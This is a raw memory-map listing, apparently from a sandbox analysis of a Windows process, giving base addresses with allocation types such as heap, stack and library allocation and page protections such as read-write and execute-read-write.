page execute and read and write
7FE89B75000
trusted library allocation
page read and write
7FE89936000
trusted library allocation
page read and write
6391000
heap
page read and write
3DE6000
heap
page read and write
38D000
heap
page read and write
1C9000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
326E000
trusted library allocation
page read and write
2B7000
heap
page read and write
1C690000
trusted library section
page read and write
45C000
heap
page read and write
4C3B000
heap
page read and write
3DFA000
heap
page read and write
7FE89872000
trusted library allocation
page read and write
1A960000
heap
page read and write
4D4000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3179000
trusted library allocation
page read and write
37FF000
stack
page read and write
377A000
trusted library allocation
page read and write
126A8000
trusted library allocation
page read and write
1C53F000
heap
page read and write
7FE89A52000
trusted library allocation
page read and write
4852000
heap
page read and write
227000
heap
page read and write
1AC000
heap
page read and write
55B000
heap
page read and write
3B5A000
trusted library allocation
page read and write
523000
heap
page read and write
377A000
trusted library allocation
page read and write
3078000
trusted library allocation
page read and write
2465000
trusted library allocation
page read and write
1C37E000
stack
page read and write
4866000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3894000
heap
page read and write
146000
heap
page read and write
3AD000
heap
page read and write
7FE89C40000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
3DD8000
heap
page read and write
2FE000
heap
page read and write
10000
heap
page read and write
12F7D000
trusted library allocation
page read and write
1B5EB000
heap
page read and write
3F8000
heap
page read and write
5172000
heap
page read and write
4A9C000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
1B570000
heap
page read and write
5169000
heap
page read and write
48B2000
heap
page read and write
3194000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
270000
heap
page read and write
27B0000
trusted library allocation
page read and write
536000
heap
page read and write
400000
heap
page read and write
7FE89A3C000
trusted library allocation
page read and write
5A6000
heap
page read and write
1EE0000
direct allocation
page read and write
2BF000
heap
page read and write
434000
heap
page read and write
4816000
heap
page read and write
35D3000
heap
page read and write
3271000
trusted library allocation
page read and write
62EC000
heap
page read and write
2EA000
heap
page read and write
2667000
trusted library allocation
page read and write
7FE89C60000
trusted library allocation
page read and write
4F88000
heap
page read and write
36C0000
heap
page read and write
710000
heap
page read and write
5179000
heap
page read and write
4D0000
heap
page read and write
473D000
heap
page read and write
2824000
heap
page read and write
2A1E000
stack
page read and write
10000
heap
page read and write
4C39000
heap
page read and write
3DDA000
heap
page read and write
326A000
trusted library allocation
page read and write
1A6F4000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
3173000
trusted library allocation
page read and write
25D000
heap
page read and write
7FE89A67000
trusted library allocation
page read and write
1C00E000
stack
page read and write
10000
heap
page read and write
5167000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
4AA5000
heap
page read and write
535000
heap
page read and write
1AD000
heap
page read and write
110000
heap
page read and write
1D00000
heap
page read and write
7FE898A3000
trusted library allocation
page execute and read and write
2D2000
heap
page read and write
4D67000
heap
page read and write
7FE89BF9000
trusted library allocation
page read and write
1F80000
direct allocation
page read and write
24F000
heap
page read and write
35B9000
heap
page read and write
5178000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
4C2A000
heap
page read and write
3ED000
heap
page read and write
4D70000
heap
page read and write
20000
heap
page read and write
1AE1F000
stack
page read and write
1C566000
heap
page read and write
1A739000
heap
page read and write
1AF8F000
stack
page read and write
1AC90000
heap
page read and write
3B9000
heap
page read and write
35B9000
heap
page read and write
2A70000
trusted library allocation
page execute read
1A745000
heap
page read and write
6327000
heap
page read and write
1B19F000
stack
page read and write
63E4000
heap
page read and write
4DB0000
heap
page read and write
555000
heap
page read and write
1C8000
heap
page read and write
1EBF000
stack
page read and write
4C3D000
heap
page read and write
1C25B000
heap
page read and write
3A2F000
trusted library allocation
page read and write
7FE89940000
trusted library allocation
page execute and read and write
3A2F000
trusted library allocation
page read and write
3DC4000
heap
page read and write
4FD9000
heap
page read and write
469000
heap
page read and write
3DC7000
heap
page read and write
4D0000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
1B03E000
stack
page read and write
7FE89BB0000
trusted library allocation
page read and write
2AA3000
trusted library allocation
page read and write
2855000
trusted library allocation
page read and write
1E3A000
stack
page read and write
363C000
heap
page read and write
3812000
heap
page read and write
502000
heap
page read and write
327E000
trusted library allocation
page read and write
3750000
trusted library allocation
page execute
7FE89AC0000
trusted library allocation
page read and write
3A10000
trusted library allocation
page read and write
1A9C2000
heap
page read and write
1AF3B000
heap
page read and write
4EE000
heap
page read and write
3899000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
56C000
heap
page read and write
2244000
heap
page read and write
FBE000
stack
page read and write
353000
heap
page read and write
3D8D000
heap
page read and write
51E000
heap
page read and write
3A2F000
trusted library allocation
page read and write
35C0000
heap
page read and write
1E7000
heap
page read and write
1E7000
heap
page read and write
3E6000
heap
page read and write
34A0000
trusted library allocation
page read and write
5176000
heap
page read and write
424000
heap
page read and write
3DD7000
heap
page read and write
29A3000
trusted library allocation
page read and write
410000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
4A9C000
heap
page read and write
1CA6E000
stack
page read and write
1D74000
heap
page read and write
58D000
heap
page read and write
1C6EF000
stack
page read and write
1C34E000
stack
page read and write
3177000
trusted library allocation
page read and write
280000
heap
page read and write
2AC6000
trusted library allocation
page read and write
363C000
heap
page read and write
26EF000
trusted library allocation
page read and write
1C372000
heap
page read and write
1B10F000
stack
page read and write
41A0000
trusted library allocation
page read and write
411F000
trusted library allocation
page read and write
1A7D8000
heap
page execute and read and write
2E1000
heap
page read and write
7FE898B4000
trusted library allocation
page read and write
3DE8000
heap
page read and write
377A000
trusted library allocation
page read and write
12451000
trusted library allocation
page read and write
7FE898FC000
trusted library allocation
page execute and read and write
3888000
heap
page read and write
2DF000
heap
page read and write
1D00000
direct allocation
page read and write
3B5A000
trusted library allocation
page read and write
7FE89B80000
trusted library allocation
page read and write
3DC4000
heap
page read and write
38E000
heap
page read and write
417000
heap
page read and write
266000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
4DAB000
heap
page read and write
330000
heap
page read and write
3E01000
heap
page read and write
1BE6000
heap
page read and write
26BF000
trusted library allocation
page read and write
2AA7000
trusted library allocation
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
2A5F000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
1AF00000
heap
page read and write
3832000
heap
page read and write
293000
heap
page read and write
1D20000
heap
page read and write
6282000
heap
page read and write
3DE5000
heap
page read and write
2451000
trusted library allocation
page read and write
10000
heap
page read and write
2536000
trusted library allocation
page read and write
4FA0000
heap
page read and write
2D4A000
stack
page read and write
1242F000
trusted library allocation
page read and write
327D000
trusted library allocation
page read and write
3DDA000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
1A840000
heap
page execute and read and write
3182000
trusted library allocation
page read and write
4A31000
heap
page read and write
355A000
heap
page read and write
16B000
heap
page read and write
48D000
direct allocation
page read and write
306000
heap
page read and write
1CC0000
direct allocation
page read and write
1FA7000
direct allocation
page read and write
3E06000
heap
page read and write
4FDB000
heap
page read and write
47A000
heap
page read and write
123F1000
trusted library allocation
page read and write
2F0000
heap
page read and write
645A000
heap
page read and write
3BF000
heap
page read and write
4E6000
heap
page read and write
3C0000
heap
page read and write
4C2D000
heap
page read and write
264000
heap
page read and write
7FE89C28000
trusted library allocation
page read and write
4D6B000
heap
page read and write
2471000
trusted library allocation
page read and write
3DDE000
heap
page read and write
381E000
heap
page read and write
1236F000
trusted library allocation
page read and write
245D000
trusted library allocation
page read and write
1E1000
heap
page read and write
2E0000
heap
page read and write
2D4000
heap
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
3888000
heap
page read and write
355F000
heap
page read and write
4890000
heap
page read and write
2CB0000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
3190000
heap
page read and write
1A360000
heap
page read and write
1A5DF000
stack
page read and write
19B000
stack
page read and write
3A1000
heap
page read and write
51AA000
heap
page read and write
27D000
heap
page read and write
3A2F000
trusted library allocation
page read and write
3D32000
heap
page read and write
4866000
heap
page read and write
51A9000
heap
page read and write
3DDE000
heap
page read and write
1A844000
heap
page execute and read and write
13322000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3A1000
heap
page read and write
340000
heap
page read and write
4D67000
heap
page read and write
2888000
trusted library allocation
page read and write
2E1000
heap
page read and write
1C0000
heap
page read and write
3EF0000
trusted library allocation
page read and write
7FE89AB8000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
4D4000
heap
page read and write
2A0A000
trusted library allocation
page read and write
4D5000
heap
page read and write
4DCE000
heap
page read and write
456000
heap
page read and write
4882000
heap
page read and write
7FE89A5C000
trusted library allocation
page read and write
16D000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
3DE0000
heap
page read and write
1A450000
heap
page read and write
535000
heap
page read and write
1EC0000
direct allocation
page read and write
7FFFFF88000
trusted library allocation
page readonly
12556000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
46E3000
heap
page read and write
12C8A000
trusted library allocation
page read and write
1C5000
heap
page read and write
1E80000
heap
page read and write
1A578000
heap
page execute and read and write
377A000
trusted library allocation
page read and write
2E3000
heap
page read and write
486B000
heap
page read and write
12648000
trusted library allocation
page read and write
1C4DB000
heap
page read and write
555000
heap
page read and write
4DD000
heap
page read and write
550000
heap
page read and write
1D3B000
heap
page read and write
3175000
trusted library allocation
page read and write
26E1000
trusted library allocation
page read and write
1B2A0000
heap
page read and write
502A000
heap
page read and write
27C2000
trusted library allocation
page read and write
3B5A000
trusted library allocation
page read and write
1C580000
heap
page read and write
30E000
heap
page read and write
4485000
trusted library allocation
page read and write
7FE89C50000
trusted library allocation
page read and write
7FE89AB0000
trusted library allocation
page read and write
1C8000
heap
page read and write
1B53D000
stack
page read and write
3B5A000
trusted library allocation
page read and write
1A505000
heap
page read and write
2E4B000
stack
page read and write
3829000
heap
page read and write
2475000
trusted library allocation
page read and write
48C9000
heap
page read and write
2A45000
heap
page read and write
1D0000
heap
page read and write
1A6F2000
heap
page read and write
2A65000
trusted library allocation
page read and write
A9E000
stack
page read and write
35B9000
heap
page read and write
3D44000
heap
page read and write
519000
heap
page read and write
317D000
trusted library allocation
page read and write
6333000
heap
page read and write
355B000
heap
page read and write
208000
heap
page read and write
2872000
trusted library allocation
page read and write
3DE0000
heap
page read and write
470000
heap
page read and write
1EE7000
direct allocation
page read and write
3CA4000
heap
page read and write
3DD4000
heap
page read and write
418000
heap
page read and write
2F5000
stack
page read and write
29C000
heap
page read and write
377A000
trusted library allocation
page read and write
3F5000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
4DAA000
heap
page read and write
3DC4000
heap
page read and write
3892000
heap
page read and write
1A5B4000
heap
page read and write
1C050000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
1C0000
trusted library allocation
page read and write
4D6B000
heap
page read and write
12431000
trusted library allocation
page read and write
1A428000
heap
page execute and read and write
436000
heap
page read and write
4C25000
heap
page read and write
7FE8993E000
trusted library allocation
page execute and read and write
7FE89960000
trusted library allocation
page execute and read and write
7FE89BE0000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
23E000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
35D3000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1B96000
heap
page read and write
4490000
trusted library allocation
page read and write
7FE89B20000
trusted library allocation
page read and write
35E9000
heap
page read and write
C0000
trusted library allocation
page read and write
214000
heap
page read and write
1B1F0000
heap
page read and write
3521000
trusted library allocation
page read and write
2AAB000
trusted library allocation
page read and write
288000
heap
page read and write
4847000
heap
page read and write
37A0000
heap
page read and write
4818000
heap
page read and write
F0000
heap
page read and write
5719000
heap
page read and write
37C5000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
4AD000
heap
page read and write
1D90000
trusted library allocation
page read and write
ED000
heap
page read and write
4778000
heap
page read and write
1B0BF000
stack
page read and write
487A000
heap
page read and write
309000
heap
page read and write
192000
stack
page read and write
535000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3B9000
heap
page read and write
2938000
trusted library allocation
page read and write
4C38000
heap
page read and write
4C0000
heap
page read and write
388B000
heap
page read and write
339E000
stack
page read and write
3D49000
heap
page read and write
473000
direct allocation
page read and write
1C4BD000
heap
page read and write
1C295000
heap
page read and write
3400000
trusted library allocation
page execute
4C3D000
heap
page read and write
1A6DB000
heap
page read and write
1B480000
heap
page read and write
1A7D0000
heap
page execute and read and write
1B00E000
stack
page read and write
3E06000
heap
page read and write
7FE89A72000
trusted library allocation
page read and write
1ACAC000
heap
page read and write
1B048000
stack
page read and write
3DC7000
heap
page read and write
3DC0000
heap
page read and write
4DCC000
heap
page read and write
30FE000
stack
page read and write
1D05000
heap
page read and write
299F000
trusted library allocation
page read and write
51A5000
heap
page read and write
327A000
trusted library allocation
page read and write
29E4000
trusted library allocation
page read and write
48BF000
heap
page read and write
461000
heap
page read and write
4490000
trusted library allocation
page read and write
7FE89956000
trusted library allocation
page execute and read and write
4D9000
heap
page read and write
4C37000
heap
page read and write
104000
heap
page read and write
3DE0000
heap
page read and write
1C2C8000
heap
page read and write
377A000
trusted library allocation
page read and write
1BB0000
heap
page read and write
34E000
heap
page read and write
4D63000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1ADE8000
stack
page read and write
7FE89B40000
trusted library allocation
page read and write
1A544000
heap
page execute and read and write
1A80E000
heap
page execute and read and write
3B5D000
trusted library allocation
page read and write
4DB000
heap
page read and write
40C000
heap
page read and write
1C8000
heap
page read and write
232E000
heap
page execute and read and write
3DFA000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
4895000
heap
page read and write
46E3000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
7FE89BF0000
trusted library allocation
page read and write
3DC0000
heap
page read and write
37F000
heap
page read and write
1E0E000
stack
page read and write | page guard
1AA6E000
stack
page read and write
3A2F000
trusted library allocation
page read and write
164000
heap
page read and write
4A70000
heap
page read and write
2C40000
remote allocation
page read and write
1C490000
heap
page read and write
1A737000
heap
page read and write
1B0000
heap
page read and write
4DCC000
heap
page read and write
224F000
stack
page read and write
270000
heap
page read and write
1ACB4000
heap
page read and write
444000
heap
page read and write
7FE8996C000
trusted library allocation
page execute and read and write
2A27000
trusted library allocation
page read and write
2354000
heap
page read and write
4CF1000
heap
page read and write
7FE89C21000
trusted library allocation
page read and write
3829000
heap
page read and write
536000
heap
page read and write
1B8000
heap
page read and write
377A000
trusted library allocation
page read and write
3B60000
trusted library allocation
page read and write
12430000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
420000
heap
page read and write
1D77000
heap
page read and write
12421000
trusted library allocation
page read and write
1E40000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
48F000
direct allocation
page read and write
2CD000
heap
page read and write
3EEE000
stack
page read and write
7FE89874000
trusted library allocation
page read and write
4D62000
heap
page read and write
268000
heap
page read and write
7FE89976000
trusted library allocation
page execute and read and write
1B09F000
stack
page read and write
2680000
trusted library allocation
page read and write
7FE8989B000
trusted library allocation
page read and write
7FE89A63000
trusted library allocation
page read and write
4DA6000
heap
page read and write
4D5F000
heap
page read and write
3053000
trusted library allocation
page read and write
1B37B000
stack
page read and write
1A6D2000
heap
page read and write
389E000
heap
page read and write
389E000
heap
page read and write
3190000
heap
page read and write
6B0000
direct allocation
page read and write
7FE89926000
trusted library allocation
page read and write
200F000
stack
page read and write
403000
heap
page read and write
317B000
trusted library allocation
page read and write
4DA000
heap
page read and write
4AA9000
heap
page read and write
4FDC000
heap
page read and write
7FE89A92000
trusted library allocation
page read and write
1C8C0000
heap
page read and write
7FE89892000
trusted library allocation
page read and write
535000
heap
page read and write
1B25B000
heap
page read and write
62BD000
heap
page read and write
1C29E000
stack
page read and write
2EE000
heap
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
6413000
heap
page read and write
3EF0000
trusted library allocation
page read and write
4CE000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
4A9B000
heap
page read and write
231F000
stack
page read and write
3D8D000
heap
page read and write
4C32000
heap
page read and write
47CC000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1270D000
trusted library allocation
page read and write
4F87000
heap
page read and write
1CF4000
heap
page read and write
3959000
heap
page read and write
1A5000
heap
page read and write
3B5A000
trusted library allocation
page read and write
246F000
trusted library allocation
page read and write
1D50000
heap
page read and write
63FB000
heap
page read and write
143000
stack
page read and write
7FE89A70000
trusted library allocation
page execute and read and write
6299000
heap
page read and write
535000
heap
page read and write
360000
heap
page read and write
2EF000
trusted library allocation
page read and write
27A6000
trusted library allocation
page read and write
51A000
heap
page read and write
1B47B000
stack
page read and write
4CB000
heap
page read and write
53A000
heap
page read and write
1FB3000
direct allocation
page read and write
1B2D0000
heap
page read and write
3A2F000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
4776000
heap
page read and write
7FE89BAD000
trusted library allocation
page read and write
459000
heap
page read and write
1B25E000
stack
page read and write
23D0000
heap
page execute and read and write
1B3F4000
heap
page read and write
3E01000
heap
page read and write
38C000
heap
page read and write
488E000
heap
page read and write
1ADDB000
heap
page read and write
4890000
heap
page read and write
34E000
heap
page read and write
3E01000
heap
page read and write
231E000
stack
page read and write | page guard
230000
heap
page read and write
41E000
heap
page read and write
D0000
heap
page read and write
1E7000
heap
page read and write
48C9000
heap
page read and write
47D0000
trusted library allocation
page read and write
4887000
heap
page read and write
4DA3000
heap
page read and write
4739000
heap
page read and write
1B35E000
direct allocation
page read and write
1A66F000
stack
page read and write
481000
heap
page read and write
3CBD000
stack
page read and write
4DAF000
heap
page read and write
1C5000
heap
page read and write
100000
heap
page read and write
7FE89970000
trusted library allocation
page execute and read and write
2467000
trusted library allocation
page read and write
1ACEE000
heap
page read and write
4B8000
heap
page read and write
1C520000
heap
page read and write
4C1E000
heap
page read and write
4730000
heap
page read and write
3182000
trusted library allocation
page read and write
4778000
heap
page read and write
1AAF9000
stack
page read and write
3882000
heap
page read and write
3A2F000
trusted library allocation
page read and write
1C5CF000
heap
page read and write
1A8FF000
stack
page read and write
5178000
heap
page read and write
425000
heap
page read and write
3DA000
heap
page read and write
4B5000
heap
page read and write
AF8000
heap
page read and write
4AA9000
heap
page read and write
24A000
heap
page read and write
3C0000
heap
page read and write
2D7B000
heap
page read and write
486000
heap
page read and write
449000
heap
page read and write
3179000
trusted library allocation
page read and write
1C260000
heap
page read and write
4AA9000
heap
page read and write
1B5A0000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
460000
heap
page read and write
1AF000
heap
page read and write
4D58000
heap
page read and write
123AD000
trusted library allocation
page read and write
1C3EB000
stack
page read and write
48B1000
heap
page read and write
1A676000
heap
page read and write
1B0000
heap
page read and write
1C31B000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
4190000
trusted library allocation
page read and write
320000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1B64F000
heap
page read and write
10000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
326F000
trusted library allocation
page read and write
1AF2E000
stack
page read and write
3B5D000
trusted library allocation
page read and write
7FE898AD000
trusted library allocation
page execute and read and write
1B41E000
stack
page read and write
4480000
trusted library allocation
page read and write
395000
heap
page read and write
3DC5000
heap
page read and write
56C000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
62A5000
heap
page read and write
4C7D000
heap
page read and write
2A0000
heap
page read and write
2870000
trusted library allocation
page read and write
1A5B7000
heap
page read and write
1AD21000
heap
page read and write
1B02E000
stack
page read and write
3CC000
heap
page read and write
1B106000
heap
page read and write
12439000
trusted library allocation
page read and write
377A000
trusted library allocation
page read and write
3DF0000
heap
page read and write
3B5A000
trusted library allocation
page read and write
1ACC8000
heap
page read and write
4C25000
heap
page read and write
258000
heap
page read and write
1C9B000
heap
page read and write
3270000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
3A2F000
trusted library allocation
page read and write
338000
heap
page read and write
21C000
stack
page read and write
1B4D8000
heap
page read and write
38B5000
trusted library allocation
page read and write
3E01000
heap
page read and write
234F000
stack
page read and write
1AFD0000
heap
page read and write
4F87000
heap
page read and write
1A45E000
heap
page execute and read and write
1D56000
heap
page read and write
4DCC000
heap
page read and write
7FE8987D000
trusted library allocation
page execute and read and write
7FE8988D000
trusted library allocation
page execute and read and write
502F000
heap
page read and write
33A0000
trusted library allocation
page read and write
4D4000
heap
page read and write
7FE89B10000
trusted library allocation
page read and write
380000
heap
page read and write
3EE000
heap
page read and write
4C7D000
heap
page read and write
377A000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
379F000
stack
page read and write
3F6000
heap
page read and write
51C000
heap
page read and write
3A20000
trusted library allocation
page read and write
328000
heap
page read and write
3DB4000
heap
page read and write
3A2F000
trusted library allocation
page read and write
3B5D000
trusted library allocation
page read and write
4D6B000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
7FE89893000
trusted library allocation
page execute and read and write
1C2E8000
heap
page read and write
47D0000
trusted library allocation
page read and write
1A57E000
heap
page execute and read and write
1C9CF000
stack
page read and write
25E3000
trusted library allocation
page read and write
7FE89880000
trusted library allocation
page read and write
6442000
heap
page read and write
336000
heap
page read and write
3DE6000
heap
page read and write
1AF000
heap
page read and write
1AFA0000
heap
page read and write
1B60000
heap
page read and write
7FE899D0000
trusted library allocation
page execute and read and write
7FE89920000
trusted library allocation
page read and write
35EE000
stack
page read and write
459000
heap
page read and write
50A000
heap
page read and write
39E000
heap
page read and write
2E4000
heap
page read and write
3E20000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
1F6000
heap
page read and write
2709000
trusted library allocation
page read and write
22E0000
heap
page execute and read and write
25F000
trusted library allocation
page read and write
4D58000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
7FE8994C000
trusted library allocation
page execute and read and write
1B0A0000
heap
page read and write
4C34000
heap
page read and write
1B5A0000
heap
page read and write
2B0000
trusted library allocation
page read and write
3182000
trusted library allocation
page read and write
334000
heap
page read and write
1B0000
heap
page read and write
1B631000
heap
page read and write
7FE89A92000
trusted library allocation
page read and write
7FE89A84000
trusted library allocation
page read and write
484D000
heap
page read and write
2B24000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
2A85000
trusted library allocation
page read and write